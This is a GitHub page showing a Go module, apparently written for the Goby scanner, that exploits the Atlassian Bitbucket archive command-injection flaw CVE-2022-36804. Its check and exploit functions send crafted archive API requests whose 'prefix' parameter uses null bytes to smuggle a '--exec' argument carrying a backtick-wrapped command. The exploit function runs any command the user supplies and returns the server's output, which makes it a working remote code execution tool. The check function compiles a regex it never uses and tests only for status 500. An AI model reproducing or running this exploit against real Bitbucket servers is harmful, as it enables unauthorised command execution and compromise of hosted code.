-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathAtlassian_Bitbucket_archive_RCE_CVE_2022_36804.go
149 lines (145 loc) · 4.63 KB
/
Atlassian_Bitbucket_archive_RCE_CVE_2022_36804.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
package exploits
import (
"regexp"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
)
func init() {
expJson := `{
"Name": "Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804",
"Description": "<p>Atlassian 发布安全公告,披露了 Bitbucket Server 和 Data Center 在 7.0.0 版中引入了一个严重安全漏洞。</p><p>Bitbucket 是 Atlassian 公司提供的一个基于 web 的版本库托管服务,支持 Mercurial 和 Git 版本控制系统。支持私有化部署,根据国内某资产测绘平台数据显示,近一年全球有超过 1w+ 相关服务对外开放。</p><p>官方漏洞公告中描述 Bitbucket Server 和 Data Center 多个 API 端点存在命令注入漏洞,漏洞触发条件是攻击者具备公开项目的访问权限或者私有项目的可读权限,影响版本从 7.0 到 8.3</p>",
"Product": "",
"Homepage": "",
"DisclosureDate": "2022-11-02",
"Author": "",
"FofaQuery": "app=\"Bitbucket\"",
"GobyQuery": "app=\"Bitbucket\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "command",
"type": "input",
"value": "id",
"show": "id"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [],
"VulType": [],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804",
"Product": "",
"Description": "<p>Atlassian 发布安全公告,披露了 Bitbucket Server 和 Data Center 在 7.0.0 版中引入了一个严重安全漏洞。</p><p>Bitbucket 是 Atlassian 公司提供的一个基于 web 的版本库托管服务,支持 Mercurial 和 Git 版本控制系统。支持私有化部署,根据国内某资产测绘平台数据显示,近一年全球有超过 1w+ 相关服务对外开放。</p><p>官方漏洞公告中描述 Bitbucket Server 和 Data Center 多个 API 端点存在命令注入漏洞,漏洞触发条件是攻击者具备公开项目的访问权限或者私有项目的可读权限,影响版本从 7.0 到 8.3</p>",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
},
"EN": {
"Name": "Atlassian Bitbucket archive RCE CVE-2022-36804",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
uri := "/rest/api/latest/projects/RIS-PRO/repos/ris-mysql-interface/archive?filename=pBwTw&at=pBwTw&path=pBwTw&prefix=ax%00--exec=%60id%60%00--remote=origin"
cfg := httpclient.NewGetRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil {
re := regexp.MustCompile(`"uid=.*\(([a-z]+)\):"`)
return resp.StatusCode == 500
}
return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
cmd := ss.Params["command"].(string)
uri := "/rest/api/latest/projects/RIS-PRO/repos/ris-mysql-interface/archive?filename=pBwTw&at=pBwTw&path=pBwTw&prefix=ax%00--exec=%60" + cmd + "%60%00--remote=origin"
cfg := httpclient.NewGetRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil {
resinfo := resp.RawBody
expResult.Output = resinfo
expResult.Success = true
}
return expResult
},
))
}